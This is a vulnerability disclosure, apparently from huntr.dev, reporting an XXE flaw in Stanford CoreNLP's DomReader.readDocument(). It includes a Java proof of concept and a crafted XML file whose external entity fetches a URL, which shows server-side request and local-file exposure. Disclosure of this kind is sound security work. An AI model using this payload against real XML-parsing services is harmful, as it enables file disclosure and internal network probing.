in stanfordnlp/corenlp

2021-10-1122:54:07

srikanthprathi

www.huntr.dev

stanford

corenlp

java

xxe

domreader

xml

vulnerable

security

EPSS

0.004

Percentile

72.7%

JSON

Description

The Stanford CoreNLP package provides a set of natural language analysis tools written in Java, is using a vulnerable XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the readDocument() function in the “DomReader.java” file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

Proof of Concept

import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;

import edu.stanford.nlp.ie.machinereading.common.*;


public class Poc {
    @SuppressWarnings({ "unused" })
	public static void main(String[] args) {    	
		try {
			File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
			DomReader obj = new DomReader();
			obj.readDocument(file);
		} catch (Exception e) {
			e.printStackTrace();
		}
    }
}

sample_ssrf.xml

&lt;?xml version="1.0"?&gt;
&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "http://127.0.0.1:8800/test.txt"&gt;]&gt;
&lt;foo&gt;&xxe;&lt;/foo&gt;

EPSS

0.004

Percentile

72.7%

JSON

Related for A11C889B-CCFF-4FEA-9E29-963A23A63DD2